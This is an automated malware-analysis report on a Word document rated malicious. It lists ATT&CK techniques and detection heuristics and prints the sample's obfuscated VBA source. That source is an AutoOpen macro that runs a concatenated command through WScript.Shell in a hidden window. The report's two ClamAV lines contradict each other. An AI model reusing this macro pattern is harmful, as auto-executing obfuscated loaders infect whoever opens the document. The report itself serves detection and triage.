Verdict: MALICIOUS (Risk Score: 310)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including an AutoOpen macro, a common technique for initial execution. The macros use WScript.Shell and CreateObject to execute commands, specifically calling the Shell() function. This indicates the macro is designed to download and execute a second-stage payload, likely from a remote source, which is a critical step in a typical malware infection chain.
Heuristics (10)
- ClamAV: Doc.Malware.Generic-6665592-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6665592-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script: Error zcKHTA / wUTvF zahNnlPTrs = CreateObject("WScript.Shell") _ . _
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: Error zcKHTA / wUTvF zahNnlPTrs = CreateObject("WScript.Shell") _ . _
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: Attribute VB_Name = "YDODBhi" Sub AutoOpen() On Error Resume Next
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9641 bytes |

SHA-256: 841bc64a264db19109233fa6cd3908094c82b4d8004b3207d8600dd40c316187
Detection (ClamAV): No threats found
Obfuscation or payload: likely. 118 of 197 identifiers look randomly generated (e.g. 'ONwEpqlVirPFk'); 3 string-concatenation chain(s), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "YDODBhi"
Sub AutoOpen()
On Error Resume Next
Error oZddJ * wYNVr / Jkwwc * rwIzjr
Error zcKHTA / wUTvF
zahNnlPTrs = CreateObject("WScript.Shell") _
. _
Run _
(ChrW(10 + 12 + 4 + 7 + 34) + jSdLmtAG + wrAAbOpQFqXA + uitbp + EwSTBjT + kSzmsN + YOBRtIDrqzn + MXkPtw + ntWlaZqQlcn + ONwEpqlVirPFk + UIdiPdp, 120775674 - 120775674)
Error dfLli / VIOYWz / EzKSq / jLzNj
Error 22900 / CTzch / MGOPR * sNlXY
Error 96996 / ktbCom / ulzYww / cvdNJ
End Sub